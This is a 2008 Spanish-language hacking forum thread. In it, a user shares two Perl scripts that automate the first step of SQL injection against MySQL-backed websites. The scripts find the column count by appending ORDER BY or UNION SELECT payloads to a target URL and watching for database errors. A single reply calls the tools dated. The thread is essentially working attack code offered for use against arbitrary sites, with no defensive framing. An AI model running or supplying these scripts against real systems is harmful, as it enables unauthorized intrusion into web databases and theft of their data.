elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [+] MySQL Column Finder
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [+] MySQL Column Finder  (Leído 2,075 veces)
Login-Root

Desconectado Desconectado

Mensajes: 37


Trust your technolust


Ver Perfil
[+] MySQL Column Finder
« en: 5 Julio 2008, 19:41 pm »

Bueno, mi primer script en perl, no sean muy duros :D

Código:
#!/usr/bin/perl

###########################################################################################
# Busca la cantidad de columnas en una inyeccion MySQL utilizando la sentencia ORDER.   ###
# By Login-Root                                                                         ###
# MSN: no.more@passport.com                                                             ###
# Jabber: login-root@x23.eu                                                             ###
# E-Mail: login_root@yahoo.com.ar                                                       ###
# In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; N3xt.d00r                        ###
# Many thanks to boER, who teach me a little of perl ;D                                 ###
# VISIT: WWW.MITM.CL | WWW.REMOTEEXECUTION.ORG                                          ###
###########################################################################################

use LWP::Simple;

if(!$ARGV[0])
{
     print "\n\n## c0ded by Login-Root | 2008 ##";
     print "\n\nUso: perl $0 http://www.web.com/index.php?id=\n\n";
     exit (1);
}

$column=1;
while (5)
{
    $sql=$ARGV[0]."-1+order+by+".$column."/*";
    $contenido=get($sql)or die("[-] Direccion web ingresada erroneamente, favor de reingresar de nuevo\n");

    if($contenido=~ /mysql_fetch_/ )
    {
         print "\n[+] Fallo el intento de obtener $column columnas\n";
         $column --;
         if ($column == 0)
         {
             $column ++;
         }
         $sql=$ARGV[0]."-1+order+by+".$column."/*";
         print "[+] La web tiene $column columnas:\n\n";
         print "$sql\n\n";
         print "## c0ded by Login-Root | 2008 ##\n\n";
         exit (1);
     }
     else
     {
         print "\n[!] Sin error al intentar con $column columnas";
         $column ++;
     }
}


Ejemplo de uso (Con ORDER):




Mismo code, pero utilizando la sentencia UNION:

Código:
#!/usr/bin/perl

###########################################################################################
# Busca la cantidad de columnas en una inyeccion MySQL  utilizando la sentencia UNION.  ###
# By Login-Root                                                                         ###
# MSN: no.more@passport.com                                                             ###
# Jabber: login-root@x23.eu                                                             ###
# E-Mail: login_root@yahoo.com.ar                                                       ###
# In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; N3xt.d00r                        ###
# Many thanks to boER, who teach me a little of perl ;D                                 ###
# VISIT: WWW.MITM.CL | WWW.REMOTEEXECUTION.ORG                                          ###
###########################################################################################

use LWP::Simple;

if(!$ARGV[0])
{
     print "\n\n## c0ded by Login-Root | 2008 ##";
     print "\n\nUso: perl $0 http://www.web.com/index.php?id=\n\n";
     exit (1);
}

$column=0;

while (5)
{
    $union.=','.$column;
    if ($column == 0)
    {
        $union='';
    }
    $sql=$ARGV[0]."-1+union+all+select+0".$union."/*";
    $contenido=get($sql)or die("[-] Direccion web ingresada erroneamente, favor de reingresar de nuevo\n");

    if($contenido=~ /mysql_fetch_/ )
    {
         $column ++;
         print "\n[!] Fallo el intento de obtener $column columnas";
    }
     else
     {
         $column ++;
         print "\n[+] La web posee $column columnas\n\n";
         print "$sql\n\n";
         print "## c0ded by Login-Root | 2008 ##\n\n";
         exit (1);
         
     }
}


Ejemplo de uso (Con UNION):




Gracias de nuevo boER!, por enseñarme algunas cosas básicas de Perl.

Saludos.


En línea

8-Bit
berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: [+] MySQL Column Finder
« Respuesta #1 en: 9 Julio 2008, 04:02 am »

Los codigos NO son malos, pero a mi punto de vista SI algo obsoletos para lo que hacen hoy en dia la infinidad de herramientas sobre SQL injection, se podria mejorar bastante si agregas mas opciones y lo conjuntas en uno solo.

-berz3k.




En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[WarScriptZone]UPX OEP Finder
Ingeniería Inversa
Tinkipinki 0 2,507 Último mensaje 4 Septiembre 2011, 12:05 pm
por Tinkipinki
[Script]Generic OEP Finder por UND3R
Ingeniería Inversa
.:UND3R:. 5 4,527 Último mensaje 5 Septiembre 2011, 22:10 pm
por .:UND3R:.
alter column
Bases de Datos
m@o_614 4 3,104 Último mensaje 19 Abril 2013, 20:35 pm
por m@o_614
Column 'cliente.docIdentidad' in on clause is ambiguous
Bases de Datos
mapers 1 2,497 Último mensaje 15 Mayo 2013, 22:10 pm
por Shell Root
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines